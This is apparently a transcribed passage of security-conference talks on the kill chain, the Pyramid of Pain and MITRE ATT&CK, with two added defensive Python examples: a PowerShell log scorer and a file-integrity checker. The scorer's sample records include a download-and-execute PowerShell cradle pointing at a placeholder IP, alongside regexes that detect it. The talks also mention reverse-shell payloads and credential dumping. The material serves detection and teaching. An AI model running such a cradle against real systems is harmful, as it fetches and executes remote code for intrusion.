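Scott's answer to the first question, monitor PowerShell rather than block it, is where a detection engineer would start. The following is an added example, not code from the talk or from hoaxshell: a small Python scorer for PowerShell script-block log records (the ScriptBlockText field of Event ID 4104 style records). It weights the indicators behind the demo's download-and-execute step, Invoke-Expression/IEX fed by a web download, plus encoded commands and long base64 blobs, and alerts when a record crosses a threshold. The indicator weights, the threshold, the record layout and the sample records are all constructed assumptions for this example, not a vendor rule set.

```python
import re

# Indicator patterns as (name, regex, weight). Weights are assumptions for
# this example: a web download alone is common admin activity, but combined
# with Invoke-Expression it is the "download cradle" the demo relied on.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(Invoke-Expression|IEX)\b", re.I), 3),
    ("web_download", re.compile(r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest)", re.I), 3),
    ("encoded_command", re.compile(r"-(EncodedCommand|enc|ec)\b", re.I), 2),
    ("long_base64", re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"), 2),
]

ALERT_THRESHOLD = 4  # assumption: IEX + download, or encoded + long blob, alerts


def score_script_block(text):
    """Return (score, [indicator names]) for one ScriptBlockText value."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def scan_events(events, threshold=ALERT_THRESHOLD):
    """Score each record (dict with host, user, ScriptBlockText) and return
    alert dicts for those at or above the threshold. Field names assumed."""
    alerts = []
    for ev in events:
        score, hits = score_script_block(ev.get("ScriptBlockText", ""))
        if score >= threshold:
            alerts.append({
                "host": ev.get("host"),
                "user": ev.get("user"),
                "score": score,
                "indicators": hits,
            })
    return alerts


# Constructed sample records: one benign listing, one download cradle, one
# legitimate download without execution, one encoded command with a blob.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "demo",
     "ScriptBlockText": "Get-ChildItem C:\\Users\\demo\\Desktop | Select-Object Name"},
    {"host": "WS01", "user": "demo",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/placeholder')"},
    {"host": "WS02", "user": "admin",
     "ScriptBlockText": "Invoke-WebRequest -Uri https://updates.example.internal/patch.msi -OutFile C:\\Temp\\patch.msi"},
    {"host": "WS03", "user": "svc",
     "ScriptBlockText": "powershell.exe -EncodedCommand " + "QQ" * 120},
]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

The scoring deliberately lets the WS02 record through: a download on its own is what patch tooling does all day, and alerting on it would bury the two records that matter. Script-block logging has to be enabled by policy before these records exist at all, and, as Scott notes, the alert arrives after execution, so this is a detection control that buys investigation time, not a preventive one.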

All right, so another round of applause, thank you Scott. [Applause] We've got a little bit of time, so feel free to take a break and we'll reconvene in 50.

All right, looks like we're good to go. Apologies for the delay. I'd like to introduce our next speaker, George Nazare; he assured me that the pronunciation was okay. George is a graduate from Youngstown State University with a Bachelor of Science in Computing Science and has been specializing in computer security for the past 20 years. Some of the companies he has worked for include Albanza Hosting, IronPort Systems, Cisco and FireEye. During his time at FireEye he worked for the Department of Defense, specializing in the U.S. Army and the U.S. Air Force. In 2019 he transitioned to the Western Canadian team to be with his family in Calgary, and in 2022, this year, George became a CrowdStriker and is a regional sales engineer for CrowdStrike covering Western Canada. This role includes, but is not limited to, endpoint security, cloud security, identity protection and threat intelligence. With his talk entitled "Building a Complete Picture: How to Gain Full Visibility of an Attacker", please welcome to the BSides stage George Nazare. [Applause]

Okay, okay, can you guys hear me now? Either a Sprint or Verizon commercial, depending on how old you are. So today we're going to be going over building a complete picture, using the kill chain, and what an attacker looks like. Okay, is this better? Okay. So we're all familiar with the kill chain, at least if we're in security, okay, and as we know we go down: reconnaissance, weaponization, all the way down to actions on objective. My goal today is to explain what type of hardware you can use. I'm not going to be bringing up any vendors; we have them in the back room. We got penalized, so we have to go into the back room over there, but we'll be more than happy to talk about the actual vendors. But what do you need in your environment to actually see this, and then what to protect it, both from a software/hardware point of view and then actual personnel? Because there's a lot of things that, in security, the worst thing is the user. We need the users, but at the same time they also cause all the problems in the environment.

So first we're going to go reconnaissance, and personally I think this is the hardest one to actually detect, and the reason I make that statement is they can be hitting you up on your LinkedIn page, your Facebook page, any type of social media you have, and you have absolutely no idea that they're doing it. None of us have access logs to Facebook; probably a couple other people do, but it'd be kind of nice to see how many people are actually hitting it. But what type of tools can you use? We've heard about the dark web monitoring; you have a bunch of companies out there that are searching the dark web, which I love that term, because everybody thinks that there's two internets: there's this really dark evil one that's in all the movies, and then there's the one that grandma's going on, looking at pretty pictures and stuff. I know, but you gotta take a look at that, see what's actually out there about either yourself or your company. They could have hacked another company and actually got some information from you because you're part of that supply chain. And then pen testing: what can pen testing help with, other than all the holes you have in your network? It's also very helpful to see where those holes are, and by seeing those holes you're able to block them, and it also stops them from doing recon, because if you have open, let's pick DNS, if you actually have what version of BIND you're running, it's very simple to figure out, okay, what type of vulnerabilities are out there to go after it. And then moving farther down, perimeter monitoring and also physical security. It's real easy; we saw here today, I can walk in the front door no problem, I can see what's going on around here, possibly I can look at some pictures on the wall that, oh, you're using Exchange, or there's a new portal that's out there, here's how I get the account, and stuff like that. So other than, we're all tied to it, we all think it's packets running around and stuff like that, but you also got to think about the physical, and a lot of people do forget about that. And then also when you get to the people: now social media, everybody loves being on social media, they want as many views as possible, but then that also says, hey, we're finding out, because you put where do you work, what activities do you do; these are great things for people to create phishing attacks and other types of information. Email awareness: we've all received some type of email that, hey, I've won a million dollars, click here so I can deposit it, or I got the latest tickets to the latest game. And then also social engineering. Now I'll date myself here, okay: one of the best social engineerings I read about was Kevin Mitnick, all the fun stuff that he did, especially in his court trials with Sprint and stuff like that. He's now working for a nice three-letter company doing consulting work for how good he was on the social media side, and some of the things he's doing now, I do not put him as a top hacker anymore; he has moved down a little bit.

So the next one I have is weaponization. This is actually the fun part from the hacker side: what type of weapon am I going to use to go to battle? You don't take a knife to a gunfight unless you wish to be one of the people that died in that fight. So I'm not gonna be trying to exploit something on Google when they're a full Microsoft shop; it's completely worthless, so I got to make sure I weaponize it correctly. Again, this is where dark web monitoring comes in; you can see some of the new tools that are out there, what the new packages are. I will give the hacking groups that: they are very useful for franchising. But then some of the other things, vulnerability management: we all love Patch Tuesday, but actually knowing what vulnerabilities you have on your network, you don't want to advertise them, because that gives adversaries a very simple way of saying, hey, I can download this GitHub code, put a couple little bit of payloads here, and away I go. And then also perimeter monitoring: do I have physical access to some boxes? That might also make me decide what weapon I wish to choose. Do I want to possibly put a drone up, do I want to do Wi-Fi scanning of the area?

So delivery. If you've talked to any IR responders or anything like that, this is probably the best stories you hear, on how did they actually deliver it. If you go all the way back, and this is neither confirmed nor denied, how was the Iranian nuclear power plant taken down? And they say they threw USB drives in the driveway. Good possibility. I've still been wanting, for a conference like this, to just throw a bunch of USB drives outside and see how many people actually pick them up, but I haven't gotten the budget yet for the USB drives. But you got to think, how do I protect myself about the delivery mechanism? Because most of the time it's something you're pulling into your network. So if you're pulling it in, again, pen testing will tell you where your holes are; perimeter monitoring, this is actually going out there where your IDS is and stuff like that to see the information come in; any type of scanning; physical security, dropping the USBs down there. Now do you have USB control? One of the fun stories I had working with the Department of Defense is they thought USB drives were bad, so they stopped every single USB drive across the network. Everybody was happy until they realized, oh, that's how we give parking tickets out, that's how we order food, here's how we do inventory, so they had to start turning them all back on to actually be productive. And other things you look in here: email gateways, web proxies. Well, if I'm going to a location because, hey, I just won a million dollars, I want my million dollars, so I'm clicking here, now you need something to protect us at the next step. And then the people again. Last month was Cyber Awareness Month; question for you: how many people still remember their cyber training that they took last month? How many people actually took the test, unless they made it mandatory? Okay, so the different things that, hey, you bring it to their attention, maybe about a week or two later they might forget about it. The best thing, if you want to test your group, send an email phishing attack over Christmas week saying, hey, here's where you get your bonus; you want to see people click on it, you'll probably get a good 70 to 80 people just clicking before they actually read anything. And then also make sure you have a good internet usage policy. I know we all hate policy, but how much do you allow your users to actually go shopping? This coming Monday, how much web usage is going to be out there for work compared to did I get the latest Cyber Monday deals, or even tomorrow being Black Friday, how much shopping did I do there? So kind of limiting where you can go, what you can get to, is another great way, and if you have it in policy it makes it also easier: if your employees accidentally click on it, you can now actually have something against them before.

Exploitation. Again, this is where I finally got to the endpoint, so you need some type of protection on there. We're way past the antivirus days, with signatures on things, that we've had in the past; you need something more powerful now. So you need EDRs, you need EPP solutions that would actually see the next generation, be able to have some machine learning and artificial intelligence behind it. Actually worry about patch management. Microsoft's actually sending out patches, but if you don't patch you're leaving a door wide open for this, and especially if Microsoft has a patch, that probably means there's an exploit somewhere in the wild that I can just go grab, put it in there, change the payload a little bit, and now I'm on your system. And once you get to this part, we start also then getting into zero trust, and I know a lot of people have talked about zero trust, but really the easiest way I think about it is every single step I go, they have to know who I am and where I'm going. So each door I go through, I got a badge; same thing on a network: every single box I go to, if I badge some way, either two-factor authentication, IP grouping, or something like that, it will help to limit if something does get in. And then again, people or users are fun and loving. Actually I've heard one story where the best tech support they ever got was actually on a piece of malware: they double-clicked on it, it didn't work, they actually called the phone number on the email, and the guy was so nice to take them step by step on how to enable macros in that Excel document, and they were then able to actually get exploited, and then they were on the network.

I was really looking for a Windows time thing here; I couldn't get one with the time going across, but I think I found a pretty good name of capture install. This is actually a radon company that I took it off their web page; there's some radar-detecting software. But we all see an installation; they try to be quiet, but if they get messy you might actually see a screen come up. That's where I go into with people: if you see something, say something. Hopefully you don't have too many noisy people in your network, but if it's your normal day and an install screen pops up and it's not your patching window, hopefully you have smart enough users that'll say, hey, something strange happened, something got installed on my laptop, can you come take a look at it? And again, with security tools, we're going back to endpoint: you need some type of advanced tactics to be gathering some type of telemetry from there to see what's going on. And then system integrity: what has changed? If I'm running a critical system, those files should not be changed on a regular basis, and if they are, well, there's probably something bad happening. So if you have some type of system integrity check, going back to Tripwire on the lovely Unix side, which was so fun to install back in the old days, and then nowadays there's systems built completely around, based on checksums, to keep track of the files.

Control. This is the things that all movies are made out of: you double-click on it and somebody in some foreign country now has complete control of your whole network. Anybody saw the old movies from the 90s? I loved how they were able to stream video over 56k modems; I could kind of get a simple dial-up to work, but they're streaming videos in these movies, showing it. But they have control. I mean, it's also known as hands-on keyboard, because somebody's remotely doing something, and this is actually the hardest thing to catch, because we're humans, we're pretty smart; we're not going to be doing step by step, we might be hopping around, and by hopping around it can confuse people. So different things to put in there: again, you want something on the endpoint; it's also nice to have firewalls at our perimeter. So why am I going there? A lot of firewalls nowadays have geolocation on where the address is. If you're not doing anything with Asia, why are you allowing the people to go to Asia? Same thing with Russia and some other things along there. And then also logging, zero trust. If you have logging turned on, yes, it might suck that you got breached, but at least you now know what happened so you can go clean it up. That's actually a very important part of saying, okay, if I know what happened, I'd slowly walk back, and when the forensic team comes in you can see every single thing that happened, and then you can, for the next step, figure out how to stop it. And then again with people: if they see something, say something. We have a lot of remote workers, so you don't have as much control of their endpoints now, but if they get a slow download, if they're just checking their email and for some odd reason their internet bandwidth goes to 100 and it's outbound, not inbound: the average home user uses a ton of inbound but very little outbound; you start seeing spikes going on outbound, there could be something happening. Either your son or daughter just figured out how to send spam out to the world, or it could be really legitimate stuff going out there. And then also, command and control: this is where they also get very sophisticated. They might use protocols that you normally don't use for communicating. How often have you used ICMP for actually communicating back and forth? I think the average person here only uses the ping command to see if something's actually working. It's a great way to steal stuff from your company: small, but it's going to take a while. Same thing with DNS TXT records: not that big, but a great way to get stuff out, because how much are you actually analyzing those protocols? Yeah, you're probably seeing how much web traffic is going over, how much VPN traffic. If I'm analyzing my DNS traffic, if it goes from 100 megs as a normal usage and spikes to a couple gigs, that's probably a problem: something's trying to get out, or something was coming in that you're not expecting. Same thing with ICMP packets: yes, it should be about 100 megs on a normal network in a day of average size before you start getting into the gigs and stuff like that; another huge red flag going out there. And if the adversary actually makes it past this one, they accomplished their goal; they got what they wanted. And this is the one thing I love saying: this is when your PR person now kind of becomes your CISO, because they're now talking about, hey, what just happened, I need to know this. Nothing against PR people, but let CISOs keep their job and actually talk to the press, or actually you don't want CISOs talking to the press about this, but if you're at the state where PR is talking, you are not in good shape. But they're actually able to accomplish it, so make sure you have things set up, both incoming and outgoing, and again, if people see strange things happening, say something. Questions, comments? I heard there's a great lunch, so I kept this short.

Do we have any questions here for George? Sorry, you finished the talk? Yeah? Okay, perfect. Any questions? All right, George will be around; let's have a round of applause. [Applause] [Music] And perfect timing for lunch, so help yourself to some sandwiches, please visit the vendor booth, please come speak with George and the other speakers, enjoy yourselves and have a great lunch; we'll be back at one o'clock.
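George's point in the installation section, that files on a critical system should not change outside a patch window and that a checksum-based integrity check will tell you when they do, is the idea behind Tripwire-style baselines. The following is an added example, not code from the talk or from Tripwire or any vendor product: a Python baseline tool that hashes every regular file under a directory with SHA-256, stores the result as JSON, and reports added, removed and modified files on a later run. The demo() walkthrough builds a constructed directory in a temporary location and tampers with it so the comparison has something to find; the file names in it are invented.

```python
import hashlib
import json
import os
import tempfile


def hash_file(path, chunk=65536):
    """SHA-256 of one file, read in chunks so large binaries do not load fully."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map each regular file under root (relative, '/'-separated) to its hash.
    Symlinks are skipped so an attacker cannot point an entry elsewhere."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full)
    return baseline


def compare(baseline, current):
    """Diff two baselines: files that appeared, vanished, or changed content."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def save_baseline(baseline, path):
    # In practice the baseline lives off-box or read-only; a local copy the
    # attacker can rewrite is only as trustworthy as the host it sits on.
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Constructed walkthrough: baseline a tiny tree, tamper with it, compare."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "service"), "wb") as f:
            f.write(b"original service binary")
        with open(os.path.join(root, "config.ini"), "w") as f:
            f.write("mode=prod\n")
        baseline_path = os.path.join(root, "..", "baseline.json")
        save_baseline(build_baseline(root), baseline_path)

        # Simulated tampering: binary replaced, config removed, new file dropped.
        with open(os.path.join(root, "bin", "service"), "wb") as f:
            f.write(b"replaced service binary")
        os.remove(os.path.join(root, "config.ini"))
        with open(os.path.join(root, "unexpected.dll"), "wb") as f:
            f.write(b"\x00")

        report = compare(load_baseline(baseline_path), build_baseline(root))
        os.remove(baseline_path)
        return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run against a real system directory the output is only useful when compared on a schedule and when the baseline is refreshed as part of the patch window George mentions, so that expected changes are absorbed and everything else stands out.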

All right, it looks like we've got a pretty full room, as full as it'll get, and might as well get started. How was lunch? Sandwiches are good, thumbs up, thanks Bob. All right, so we've got Jason Maynard doing the Cisco-sponsored talk, and no offense to the potential other five-time Edmonton BSides speakers, but Jason is a five-time, this is his fifth time presenting at BSides Edmonton. So maybe Prashant, maybe Adam, I'm not sure, but definitely Jason's been here before. Adam, who? Yeah. So Jason's bio: Jason has been architecting, designing and deploying security technologies that secure the most complex computing environments for almost two decades. His understanding of operational and information technologies, people and process enables him to deliver effective, comprehensive security solutions that align to an organization's security goals and strategic imperatives. Jason is adept at addressing a range of risk profiles across multiple industry verticals, skills he has cultivated as an end-user security practitioner, partner/integrator, and now manufacturer as a senior multi-domain architect focused on cyber security for Cisco Systems. Jason is also active in the direct community, speaking at the BC Aware privacy and security conference, and has delivered multiple sessions at not just BSides Edmonton but other BSides as well, and Jason holds over 75 designations across a variety of products and technologies, including the CCIE designation. So with his talk, the Cisco-sponsored talk, entitled "Advanced Persistent Defenders (APD!)", please welcome to the BSides stage Jason Maynard.

Can you guys hear me all the way in the back? Can you guys hear me? Awesome. All right, so five years at BSides Edmonton; it's pretty amazing the work that they've done putting this event together, and seeing all these great people trying to be better when it comes to security. This talk is a little bit interesting. I got thinking a little bit about how do we advance as defenders, and we talk about advanced persistent threats all the time, and I came up with, I think, but maybe it's not, maybe somebody's already come up with it, the term Advanced Persistent Defenders, or threat-informed defenders. We'll talk a little bit about that today.

So we're going to talk about: who here knows the Pyramid of Pain? And not like one of those other sites that you probably shouldn't be going to; yeah, everyone knows that one, but not this one. So we'll talk a little bit about the Pyramid of Pain. MITRE ATT&CK: who's using MITRE ATT&CK in their organization today? A few, okay. Insight into ATT&CK Navigator, that's a tool within the MITRE ATT&CK framework, or that MITRE ATT&CK provides us, and anybody do adversarial emulation? Yup, okay, cool. All right, so let's talk about the Pyramid of Pain. I think it's David Bianco that created the Pyramid of Pain, but basically what it is is a pyramid, and as you get higher up in that stack it gets a little bit more difficult for the adversary to overcome. And so when you look at hash values as an example, every one of us defends using hashes, right? They're very trivial for the adversary to overcome, and this is kind of setting the stage of why we need to elevate our capabilities. It's not to ignore the lower stacked items like hashes and IP addresses and domain names, but it's also to make sure that we're actually elevating, and we'll talk more about that in a second. So I'm not sure how well you're going to see this; can you guys see it okay in the back with binoculars? No? I'm going to explain it, so that's good, right?

And it's going to be recorded, right, Harv, or vendor, right? This is recorded, so you'll be able to see it later anyway. But what I'm showing here is msfvenom; it's a tool that allows me to create malicious payloads that an adversary may want to leverage to try to drive an outcome. One of those outcomes might be a reverse shell back to me so I can access that machine, very simple, right? And so as an adversary I'm going to create this payload and I'm going to find a mechanism to distribute it. Might be a phishing link, it could be an attachment, it could be through all kinds of other means, or it could be USB keys at an event; how many people picked up a USB key today, right? But anyways, it could be multiple different ways. And so you'll have this SHA at the very bottom here; there's the SHA-256 of that file. In any one of your defensive tools that knows about that SHA, what are they going to do if they see that file? Kick it out, right, they're gonna block it. So easy, right? That's an easy defensive mechanism that you're gonna use, most likely fed through security intelligence. But the adversary can very easily re-run this and get a different output, so that SHA would change. So if they're clever enough, they'll make sure that they're constantly changing that payload, which means that the hash that you're defending against is no longer relevant, right? You're no longer immune to that attack, so the control is bypassed, so that's why it's trivial, right? When we start looking at IP addresses: how many people block based on IPs? Everybody does, right? And this is doing an analysis of a specific piece of malware called TeslaCrypt, that probably everybody knows; there's a decrypter out there, it's not relevant today, but it's really about the data points. But you have an IP address, you're going to block it, easy peasy. Fast flux: so you front this with the domain, you flip out the IPs constantly. Can you block that in other ways? Absolutely, but if you don't have that mechanism in place, the adversary is bypassing all your controls if you're doing IP-based controls or hash. So again, very easy for the adversary to overcome, but we're not disputing the value of leveraging that capability: get rid of the noise, right? Now when it comes to domains, again we've got a domain, the domain name is X, we block it, we're done, right? But no, the adversary is persistent, and so maybe they're going to use domain generation algorithms to dynamically create domains, and therefore that domain that you're initially blocking is no longer relevant and you've bypassed that control. Very easy for them to overcome that specific control. Now you might say, well, wait a minute, we've got some technology that does some reverse engineering around DGAs and they're able to predict what the future domain might be. Yeah, that's a control and it's a valuable one, but at the surface here it's easy for the adversary to overcome. So those are the three kind of core pieces that we use, usually through security intelligence, or that you've gone into a blog and you've read a bunch of details around the blog and there's a bunch of IOCs; that's typically what we see, and then we feed that into our controls and life is good.

Right? We hope. As we start moving into the stack, this is where it gets a little bit harder for the adversary to overcome. So for example, if we're using network-based controls, like a C2 server that's embedded, or a protocol that's embedded within malware that we're leveraging, if it is malware, and we're able to mitigate at that layer, it becomes harder for the adversary to overcome. So an example of that is you've got these malicious domains, could be DGAs, right, as an example, and you've reverse engineered it. The adversary, what do they have to do to overcome it? Anybody want to throw out an idea? What do you have to do to overcome it if I have something that has an algorithm that could predict the future, or reverse engineer the DGA that you created? How do I overcome that as an adversary? I've got to re-create that payload with the new DGA, right? So now I'm actually going back to the trenches a bit and having to do some development and recreate the DGA and the algorithm that I'm using in order to overcome your defensive capabilities. Why is it annoying? Well, now it's not about changing an IP or changing the hash value or changing the domain; it's now programmatically having to make a change, and that makes it difficult. Then we get into host artifacts. These are artifacts within the host themselves: you've got registry key entries, files, directories, mutexes, anything like that that resides on the host itself. And this is an example of where malware's looking and trying to disable the Windows Security Center message saying, hey, alert, alert, the firewall's turned off, right, your antivirus is turned off, go turn it back on. They're going to try to suppress that message so you don't know when they disable your defensive capabilities within the platform. Very trivial control or mitigating capability, right? They're trying to reduce noise, not really doing a whole lot, but they are shutting down your protection mechanisms, and if I'm able to defeat that as a defender, again they have to find another way around this. So maybe they disable it and you get a notification and now the user goes and enables it, right, or you have a process that's monitoring it and it re-enables it the moment it's disabled. It makes it hard now for the adversary to disable that antivirus or that protection mechanism that you have on the asset. So again, we're higher in the stack, but they can overcome these controls. Now we get into tools. So for example, if I need to remove volume shadow copies on Windows, right, everybody knows what volume shadow copies are, right, the constant backup of your Windows systems and file systems so you can restore data. If I need that in order to ensure that you can't recover from ransomware that I've shared with you, right, over friendly terms, maybe, maybe not, right, then it's going to be very difficult, because what's going to happen? You're going to get encrypted, then you're going to recover the data, and you're not going to pay. And so what the adversary has to do is now they have to think of another means, right, because they're not going to be able to encrypt the drive and force you to pay, because you have a recovery mechanism. Now this is a very simple one, localized on the asset, but what if you had a remote platform that was constantly doing backups from those systems? Very hard for them to disable that capability, so now they have to think of another method. Now what would that method be, if I can't encrypt the drive and drive that ransomware outcome? Maybe now it's extortion. So now I gotta siphon data from the asset, send it somewhere, to say, hey, I've gotten some photos of you last night, right, now you're gonna pay. I might not be able to encrypt your drive, but where you were last night, you're gonna pay me anyway, right? Again, the adversary has to now come up with another method. And then you get into TTPs, tactics, techniques and procedures, right, and this is where it's very difficult for the adversary to overcome.

This is an example of some TTPs that could be captured, and we'll talk more about those in a second, but in order for the adversary to overcome them it's very, very difficult. So this is an example here of TeslaCrypt needing to drive the ability to encrypt on the asset. Now, if I can't encrypt, so if I have some technology, doesn't matter the vendor, if the capability exists and it monitors the system for any activity that tries to encrypt files, okay, maybe one or two files get encrypted and then that process gets killed, because that's what that software does: it manages and watches to see if there's some behavior that isn't normal, such as encrypting the drive en masse automatically for no good reason; it kills that process. Now once that happens, think about the adversary. As I mentioned, you have to maybe think about what you're going to do in order to get them to pay or drive some kind of monetary fund or disrupt, whatever the goals of the adversary are. But maybe now I've got to steal credentials, right, because the encryption portion of my activities is never going to be realized, and so now I want to maybe harvest credentials. How am I going to do that? Well, maybe I need a Mimikatz-type capability within malware to harvest those credentials, so now I get usernames and passwords and hope there's no MFA within the environment, and I can start logging in as users within the environment. So it makes it very, very difficult, right, because you're making them go all the way back to the beginning and rethink their plans, and it's very, very disruptive, not as a defender but as an adversary. So an example of this would be, you have this particular piece of ransomware that has a whole bunch of tactics and techniques that are part of it, and we'll talk more about it, but there's things like initial access, execution, persistence, and so on that the adversary must achieve in order to drive an outcome. Now how often does the adversary need to be right within this attack chain or kill chain, right? They have to be successful in almost every portion of it in order to drive an outcome. Where do we have to be successful as defenders? Anyone? No one? Was lunch that good? Your hand's up, you have to answer now. That's right, yes, one of them. See, Cisco people, give them something. No, I'm just kidding, just kidding, you have to go to the booth. But anyways, yeah, you're right, we only have to be right in one spot; they have to be right in the entire kill chain, so the advantage is to the defender. So why are we getting popped so much, right? And I think it's because there's complexity within the environments that we defend, and some of the tooling that we have may have become a little bit more complicated than it has to be, and we're not defending at the right layer. It doesn't mean, again, you get rid of hashes, IPs and domains; you still do that, but you elevate the game. So what does this do for us, right? It increases the cost of the adversary for doing business, right, at least with us. It provides us time-based defense: if they have to go up higher in the stack and change their tactics and techniques, guess what, we've got time now on our side to use other defensive capabilities.

to disrupt that one area that won't allow them to be successful so what is miter well miter is a non-profit company out of the U.S and it's public private Partnerships and focused on cyber security these are the folks that bring you cves right vulnerability exposure database um and they've created what what is now known as attack and attack is really focused on adversarial tactics techniques and and uh and provides common knowledge around how the adversary goes about um compromising an environment and it was born in 2013 again it focuses on those ttps as I mentioned um there's a global accessible knowledge base you can use it to help um develop threat models and methodologies around private sector

public sector government uh and so on but really it focuses on the adversarial's perspective The Who right the adversary their goals the why and then the methods the how and who would leverage this well it could be red teamers blue teamers uh you can use it for Gap analysis assessments adversarial emulation we're going to talk a little bit more about those as we go along too everybody knows what a threat is right I'm dropping it down a bit because we I know we've got all kinds of different skill sets within the audience so in order for a threat to be realized you need a capability an intent and an opportunity so the capability could be the

adversary's tooling skills education supply chain so for example it develops an undisclosed exploit increases their capabilities right the problem with that portion of it is we have no control as Defenders at this piece none zero you can't control this they're doing this out of band 100 percent um but we need to understand the adversarial's knowledge and again that's where attack comes in now intent is really the adversary's motivation right their intent or willingness to succeed so why are they doing it well profit Espionage impacts uh to supply chain hacktivisms those are some of the outcomes again how much control do we have zero none but again we need to understand the adversary the opportunity this now it comes to

timing and knowledge of the target this is the Vols the zero days time of business this is where we have the ability to add a control or mitigating capability to defend or defeat the adversary so this could be things as simple as patching and networking segmentation MFA anybody here heard of it right MFA um but the adversary continues to elevate their capabilities as you add controls they find ways around them this is a never-ending game so think about this as the analogy right you've got uh some criminal robber right and they're portraying to be uh somebody from the anybody get it where they you know that says energy come show me your belt come come to their show me your

belt right and you see that maybe you don't open the door but lots of people do right they see that they trust the person they open the door and if if the robber or criminal wants to to rob you at that point you've just given them access to your your home right and so you open the door the Intruder gains access and does whatever they want to do they go to another neighborhood guess what they do the same thing they knock on the door you see the badge you open the door the Intruder now has access to your home Now by this time police are informed right by other homeowners that this is taking place so they know now there's a

robber portraying as an energy company they want to gain access to your home uh they use fake credentials in order to achieve that outcome right and so think of miter right miter's part of that right it's very similar the robbers the adversary the tactic that they want to do is to gain access to your home and the technique that they're using to gain access is these fake badges that harv gave out earlier today um but anyways now they go to the third home but now we're educated we know a little bit about it knocks in the door opens the door or does it right at this point does not open the door because we know that this this activity is taking

place call police we shut it down right so that's the analogy right that's why we want to work at these layers um even though we've got the door shut the door might even be locked right those are our hash values our IP addresses right but the adversary is going to elevate their capability think of it too as like the periodic table right this is the most important tool in chemistry right describes all the details around it it's concise you can't do anything in chemistry without it um and you know you can take two of some elements and make stuff right so two hydrogen one oxygen creates H2O miter attack is very much the same thing

you've got a column of tactics reconnaissance uh you know initial access Etc and then you have techniques how do they drive that outcome and then there's sub techniques that may be specific to what to a higher level technique and we'll talk a little bit more about that in a second but it describes the objectives desired by the adversary so for example if they want to get initial access privileged escalation these are the steps that they're going to take in order to drive that outcome and and the other thing that it provides is not only the tactic the technique sub technique but also the procedures that that are involved so it'll include a lot of details around the mitigation

capabilities within the platform as well so what does that look like well a tactic would be privilege escalation so this is the adversary trying to get higher escalation so if for example if I get on a Windows asset that's only got a local user that's not a local admin I want to get admin access to that asset and then eventually I want to get access to the domain controller and get Enterprise admin there right that's escalating my privilege over time now the technique for me to do this could be something like boot or log on auto start for execution and so what I'm going to do is I'm going to leverage the registry keys within windows and I'm going to put

in some things to automatically run that may help me elevate my privilege you can use this for persistence as well but that's what the adversary is looking to do in order to get escalated privileges now if I make it impossible or difficult or I monitor because you can't defend against everything I monitor these keys for example then I could Trigger or at least know that an adversary may be in the environment and if I can lock it down guess what they can't use that that tactic and technique and some technique right the game is over they gotta find a different way so again we concentrate on the root of the problem to to achieve a security

outcome and so think of the three layers at the bottom as the symptom so they're good they drive a specific outcome and they can defend against very you know commoditized type attacks even if they're a little bit Advanced IP hashes and and um and domain names aren't right that component of it is never going to be advanced and so um obviously we can leverage them but the problem with that is it's easy for the at the adversary or attacker to overcome now you get into the problem statement so as as you get up higher you know Network host artifacts tools ttps it makes it very very difficult now there is a challenge for Defenders here right

for example if I'm the adversary and I need Powershell in order to move laterally within the network and you shut down Powershell guess what I can't do it but if you also use Powershell as a management tool within the environment it might be very difficult for you to shut it down or wmic in a Windows environment Etc right so again it's hard because there's Nuance there's some tactics and techniques that are being leveraged that operationally you cannot remove so that's where you're going to have to leverage or rely on things that can detect maybe certain activities that might be taking place or looking for another area within that chain where you can defend against so what is inside uh attack so it's fed

with open source blog entries uh you know research and development from minor Community feeds the good thing about this this is real data that's happening live right this is not some scenario someone's thinking that could happen these are actually being realized in the wild and so you got 14 techniques when you look at there's a couple of breakdowns and we'll get into those uh but but for Enterprise we've got mobile and ICS as well but for Enterprises 14 techniques as of the fourth of uh November there's 193 techniques 401 sub techniques and then there's 135 groups like EPT 33 that leverage these tactics and techniques and then they're leveraging about 718 software applications and then there's a

bunch of mitigating control so the nice thing about this as well is not only are you defending at the TTP level you have now the ability to to build in mitigating controls just by going to miter and learning a little bit about the adversary right you might not be able to control all the ttps that you discover but there's going to be enough mitigating capabilities Within typically not always within the um the analysis that you're doing that you can add to your environment and hopefully make it difficult for the adversary that they move on to another organizations so Enterprise has Windows Mac OS and Linux cloud has is SAS and o365 Google workspaces Azure ad they've got

containers and networks Mobile's got IOS and Android so you could be at the Enterprise level or you can drop down into these specific areas of Interest uh and then there's the ICS um attack frame um uh miter attack framework that you could leverage as well you can also use sticks taxi feeds coming out of the platform Navigator Matrix we're going to show you a little bit of how we look at an adversary's tactic and techniques and then we overlay this with our controls and then we look at the gaps so we do a gap analysis to determine where the gaps are in our environment and then we can either accept that risk meaning that there's enough controls in other areas

to mitigate mitigate the overall risk or we address them right because they're concerned and that's an example of of a stick's output right you've got a threat actor attributed to a campaign and there's a whole bunch of different models that that support that so understanding the miter attack uh relationships between each one so you have a group over here right you've got a group that uses a technique that's driven with software that's trying to accomplish something the tactic and so over here you've got EPT 33 right the adversarial group that's going to leverage Mimi cats to do credential dumping and their goal is credential access right to systems there's mitigating capabilities that may outline some preventative capability

